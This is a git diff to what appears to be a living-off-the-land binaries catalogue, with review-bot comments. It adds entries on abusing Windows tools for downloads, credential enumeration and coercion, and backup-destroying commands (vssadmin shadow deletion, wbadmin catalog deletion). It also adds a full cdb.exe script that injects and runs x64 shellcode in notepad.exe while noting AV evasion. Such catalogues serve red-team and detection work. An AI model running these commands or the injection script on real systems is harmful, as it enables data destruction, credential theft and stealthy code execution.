diff --git a/Backlog.txt b/Backlog.txt new file mode 100644 index 0000000..9d8c7e3 --- /dev/null +++ b/Backlog.txt @@ -0,0 +1,17 @@ +Ntsd.exe Debugger +Kd.exe Debugger +Certreq.exe Exfiltrate data +Dbghost.exe +Robocopy.exe Needs examples +Bitsadmin.exe bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 +Vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet +notepad.exe Gui - Download files using Open (A lot of other programs as well) +netsh.exe Netsh helper dll file loading +wbadmin.exe wbadmin delete catalog -quiet +psexec.exe Remote execution of code +java.exe -agentpath: or -agentlib: +WinMail.exe DLL Sideloading +odbcad32.exe GUI DLL Loading +WseClientSvc.exe - https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f +dvdplay.exe http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/ +http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/ diff --git a/Contribute.md b/Contribute.md index 45c2710..4e64756 100644 --- a/Contribute.md +++ b/Contribute.md @@ -4,7 +4,7 @@ to send me a tweet and I will add the contribution for you. ## Binary.exe -* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search +* Functions: Execute, Download, Copy, Read ADS, Write ADS, UACBypass, Search, Compile, Credentials ``` Example @@ -29,4 +29,8 @@ Notes: Some specific details about the binary file. +Detection: +Details about detection. +IOC, Behaviour , User Agents etc + diff --git a/LOLBins.md b/LOLBins.md index 3121a54..9daa59c 100644 --- a/LOLBins.md +++ b/LOLBins.md 
@@ -8,8 +8,10 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Atbroker.exe](OSBinaries/Atbroker.md) [Bash.exe](OSBinaries/Bash.md) [Certutil.exe](OSBinaries/Certutil.md) +[Cmdkey.exe](OSBinaries/Cmdkey.md) [Cmstp.exe](OSBinaries/Cmstp.md) [Control.exe](OSBinaries/Control.md) +[Csc.exe](OSBinaries/Csc.md) [Cscript.exe](OSBinaries/Cscript.md) [Dfsvc.exe](OSBinaries/Dfsvc.md) [Diskshadow.exe](OSBinaries/Diskshadow.md) @@ -30,6 +32,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Msdt.exe](OSBinaries/Msdt.md) [Mshta.exe](OSBinaries/Mshta.md) [Msiexec.exe](OSBinaries/Msiexec.md) +[Nltest.exe](OSBinaries/Nltest.md) [Odbcconf.exe](OSBinaries/Odbcconf.md) [Pcalua.exe](OSBinaries/Pcalua.md) [Powershell.exe](OSBinaries/Powershell.md) @@ -38,10 +41,12 @@ If you are missing from the acknowledgement, please let me know (I did not forge [Reg.exe](OSBinaries/Reg.md) [Regedit.exe](OSBinaries/Regedit.md) [Regasm.exe](OSBinaries/Regasm.md) +[Regini.exe](OSBinaries/Regini.md) [Regsvcs.exe](OSBinaries/Regsvcs.md) [Regsvr32.exe](OSBinaries/Regsvr32.md) -[Robocopy.exe](OSBinaries/Robocopy.md) [Replace.exe](OSBinaries/Replace.md) +[Robocopy.exe](OSBinaries/Robocopy.md) +[Rpcping.exe](OSBinaries/Rpcping.md) [Rundll32.exe](OSBinaries/Rundll32.md) [Runscripthelper.exe](OSBinaries/Runscripthelper.md) [Sc.exe](OSBinaries/Sc.md) diff --git a/OSBinaries/Cmdkey.md b/OSBinaries/Cmdkey.md new file mode 100644 index 0000000..adf4324 --- /dev/null +++ b/OSBinaries/Cmdkey.md @@ -0,0 +1,30 @@ +## Cmdkey.exe + +* Functions: Credentials + +``` +cmdkey /list +``` + +Acknowledgements: +* + +Code sample: +* + +Resources: +* https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation + +Full path: +``` +c:\windows\system32\cmdkey.exe +c:\windows\sysWOW64\cmdkey.exe +``` + +Notes: + + +Detection: + + + diff --git a/OSBinaries/Csc.med b/OSBinaries/Csc.med new file mode 100644 index 0000000..452fc1f 
--- /dev/null +++ b/OSBinaries/Csc.med @@ -0,0 +1,31 @@ +## Csc.exe + +* Functions: Compile + +``` +csc -out:My.exe File.cs + +csc -target:library File.cs +``` + +Acknowledgements: +* ? + +Code sample: +* + +Resources: +* https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe +* + +Full path: +``` +C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe +``` + +Notes: + + +Detection: +? \ No newline at end of file diff --git a/OSBinaries/Nltest.md b/OSBinaries/Nltest.md new file mode 100644 index 0000000..6429ba5 --- /dev/null +++ b/OSBinaries/Nltest.md @@ -0,0 +1,28 @@ +## Nltest.exe + +* Functions: Credentials + +``` +nltest.exe /SERVER:192.168.1.10 /QUERY +``` + +Acknowledgements: +* Sysopfb - @sysopfb + +Code sample: +* + +Resources: +* https://twitter.com/sysopfb/status/986799053668139009 + +Full path: +``` +c:\windows\system32\nltest.exe +``` + +Notes: + + +Detection: + + diff --git a/OSBinaries/Regini.md b/OSBinaries/Regini.md new file mode 100644 index 0000000..276845a --- /dev/null +++ b/OSBinaries/Regini.md @@ -0,0 +1,29 @@ +## Regini.exe + +* Functions: Credentials + +``` +regini -m \\RemoteServer Example +``` + +Acknowledgements: +* Osanda Malith - @OsandaMalith + +Code sample: +* + +Resources: +* https://twitter.com/OsandaMalith/status/987823644402372608 + +Full path: +``` +c:\windows\system32\regini.exe +c:\windows\sysWOW64\regini.exe +``` + +Notes: +Can also be used to add registry keys + +Detection: + + diff --git a/OSBinaries/Rpcping.md b/OSBinaries/Rpcping.md new file mode 100644 index 0000000..0ba654b --- /dev/null +++ b/OSBinaries/Rpcping.md 
@@ -0,0 +1,34 @@ +## Rpcping.exe + +* Functions: Credentials + +``` +rpcping -s 127.0.0.1 -t ncacn_np + +rpcping -s 192.168.1.10 -t ncacn_np +``` + +Acknowledgements: +* Casey Smith - @subtee + +Code sample: +* + +Resources: +* https://twitter.com/subtee/status/872797890539913216 +* https://github.com/vysec/RedTips +* + +Full path: +``` +c:\windows\system32\rpcping.exe +c:\windows\sysWOW64\rpcping.exe +``` + +Notes: + + +Detection: + + + diff --git a/OSBinaries/Wmic.md b/OSBinaries/Wmic.md index f07751b..277393c 100644 --- a/OSBinaries/Wmic.md +++ b/OSBinaries/Wmic.md @@ -36,7 +36,7 @@ Acknowledgements: * Casey Smith - @subtee Code sample: -* [Wmic_calc.xsl](Payloads/Wmic_calc.xls) +* [Wmic_calc.xsl](Payloads/Wmic_calc.xsl) Resources: * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory diff --git a/OtherMSBinaries/Cdb.md b/OtherMSBinaries/Cdb.md index df29bad..2fef143 100644 --- a/OtherMSBinaries/Cdb.md +++ b/OtherMSBinaries/Cdb.md @@ -1,4 +1,4 @@ -## cdb.exe +## Cdb.exe * Functions: Execute @@ -7,5 +7,26 @@ cdb.exe -cf x64_calc.wds -o notepad.exe ``` Acknowledgements: -* Matt Graber - @mattifestation - \ No newline at end of file +* Matt Graeber - @mattifestation + +Code sample: +* [Cdb_calc.wds](Payload/Cdb_calc.wds) + +Resources: +* http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html +* https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options +* https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda + +Full path: +``` +C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe +C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe +``` + +Notes: +Part of the Debugging tools for Windows + + +Detection: +? + diff --git a/OtherMSBinaries/Payload/Cdb_calc.wds b/OtherMSBinaries/Payload/Cdb_calc.wds new file mode 100644 index 0000000..4073bb5 --- /dev/null +++ b/OtherMSBinaries/Payload/Cdb_calc.wds 
@@ -0,0 +1,93 @@ +$$ Save this to a file - e.g. x64_calc.wds +$$ Example: launch this shellcode in a host notepad.exe process. +$$ cdb.exe -cf x64_calc.wds -o notepad.exe + +$$ Allocate 272 bytes for the shellcode buffer +$$ Save the address of the resulting RWX in the pseudo $t0 register +.foreach /pS 5 ( register { .dvalloc 272 } ) { r @$t0 = register } + +$$ Copy each individual shellcode byte to the allocated RWX buffer +$$ Note: The `eq` command could be used to save space, if desired. +$$ Note: .readmem can be used to read a shellcode buffer too but +$$ shellcode on disk will be subject to AV scanning. +;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4 +;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00 +;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51 +;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51 +;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2 +;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52 +;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52 +;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52 +;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72 +;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7 +;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31 +;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0 +;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C +;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41 +;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41 +;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED +;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48 +;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B +;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01 +;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88 +;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48 +;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67 +;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50 +;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb 
@$t0+5F 44 +;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49 +;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56 +;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41 +;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48 +;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31 +;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0 +;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9 +;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1 +;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1 +;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24 +;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1 +;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44 +;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49 +;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41 +;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44 +;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49 +;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B +;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01 +;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41 +;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A +;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59 +;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83 +;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52 +;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41 +;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B +;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF +;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48 +;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00 +;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00 +;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D +;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00 +;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B +;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5 +;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A +;eb @$t0+E8 
0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6 +;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF +;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4 +;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C +;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0 +;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47 +;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A +;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89 +;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63 +;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00 + +$$ Redirect execution to the shellcode buffer +r @$ip=@$t0 + +$$ Continue program execution - i.e. execute the shellcode +g + +$$ Continue program execution after hitting a breakpoint +$$ upon starting calc.exe. This is specific to this shellcode. +g + +$$ quit cdb.exe +q \ No newline at end of file
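Review bot: In the Backlog.txt hunk, the Bitsadmin.exe line uses the PowerShell-only `$env:TEMP` variable in what reads as a cmd.exe command; note the shell it expects, or write the destination with `%TEMP%`, so a reader who pastes it into cmd.exe does not get a literal `$env:TEMP` directory. The Vssadmin.exe (`vssadmin.exe Delete Shadows /All /Quiet`) and wbadmin.exe (`wbadmin delete catalog -quiet`) lines are destructive on the machine they run on; mark them as such in the backlog so nobody test-runs them while writing up the entry. The `Robocopy.exe Needs examples` line also duplicates work already tracked by the existing OSBinaries/Robocopy.md entry referenced in LOLBins.md.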
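Review bot: In the Contribute.md hunk, the new function name `Credentials` is used in two different senses by the entries this patch adds (Cmdkey.exe enumerates stored credentials, while Rpcping.exe, Regini.exe and Nltest.exe are about coercing an authentication to a remote host), so the template should define what `Credentials` covers, or split it into two functions, before more entries adopt it. Also fix the stray space in `IOC, Behaviour , User Agents etc` and end the new Detection block with a newline rather than the dangling blank lines.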
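Review bot: In the OSBinaries/Cmdkey.md hunk, Acknowledgements contains an empty bullet and Notes is blank, which leaves `cmdkey /list` without context: it only enumerates saved credential entries (target names and user names) and does not print the stored secrets, so the Notes should say how the listing feeds the privilege-escalation case the linked peew.pw resource is about. Either fill the Acknowledgements bullet or remove it so the entry does not render an empty list item.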
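Review bot: The new file in this hunk is named `OSBinaries/Csc.med`, but the LOLBins.md hunk links to `OSBinaries/Csc.md`, so the index link will 404 until the file is renamed to `Csc.md`. The entry also ships with `?` placeholders in Acknowledgements and Detection and no newline at end of file; replace the placeholders with content or the template's empty bullets before merging. Consider whether the Full path block should also list the v2.0.50727 Framework directories, which carry a csc.exe on hosts with .NET 3.5 installed, since a detection built only on the v4.0.30319 paths would miss that copy.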
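Review bot: In the OSBinaries/Nltest.md hunk, `Functions: Credentials` is not explained anywhere: `nltest.exe /SERVER:192.168.1.10 /QUERY` reads as a secure-channel status query, i.e. discovery, so the Notes should state the credential angle (presumably that contacting the host given in `/SERVER:` makes the client authenticate to it) or the function tag should change. Full path lists only `c:\windows\system32\nltest.exe` while the sibling entries in this patch list both system32 and sysWOW64 copies; check whether a SysWOW64 copy exists and list it for consistency.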
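Review bot: In the OSBinaries/Regini.md hunk, the example `regini -m \\RemoteServer Example` passes `Example` as the registry script file that regini reads, but nothing in the entry says so; state that it is a filename so readers do not take the token literally. The Notes line `Can also be used to add registry keys` understates the tool: applying a registry script is regini's documented purpose, and with `-m \\RemoteServer` the script is applied to the remote machine's registry, which is presumably where the `Credentials` angle (authenticating to `\\RemoteServer`) comes from; say that explicitly.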
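Review bot: In the OSBinaries/Rpcping.md hunk, the Notes block is empty, so the reader is not told why `-t ncacn_np` matters: the named-pipe transport makes rpcping connect to the host in `-s` over SMB and authenticate as the current user, which is the `Credentials` function the entry claims. The first example, `rpcping -s 127.0.0.1 -t ncacn_np`, only exercises the local machine and demonstrates nothing about that; keep the remote-host form as the primary example or label the loopback one as a syntax check. Resources also ends with an empty `*` bullet that should be removed.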
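Review bot: In the OtherMSBinaries/Cdb.md hunk, the Code sample link points to `Payload/Cdb_calc.wds`, while the OSBinaries/Wmic.md hunk in the same patch links to `Payloads/Wmic_calc.xsl`; pick one directory name for payload samples across the repository. The example command `cdb.exe -cf x64_calc.wds -o notepad.exe` references a filename that differs from the committed sample `Cdb_calc.wds`; either rename the sample or update the command so the example runs against the file that is actually in the tree. The Full path block lists the x86 debugger too, but the committed sample is x64-only shellcode, so the Notes should say the example needs the x64 cdb.exe and a 64-bit target process. Detection is still a `?` placeholder.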
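Review bot: In the OtherMSBinaries/Payload/Cdb_calc.wds hunk, the 272 bytes of shellcode are committed without any note on where they came from or how to regenerate them, so a reader cannot verify what the blob does beyond the trailing `63 61 6C 63 00` (ASCII `calc` plus a NUL) and the `.dvalloc 272` size matching the `@$t0+00` to `@$t0+10F` writes; add a header comment naming the generator and the options used, as the linked exploit-monday.com post does. The header comment `Save this to a file - e.g. x64_calc.wds` is inconsistent with the committed filename `Cdb_calc.wds`, and the file has no newline at end of file.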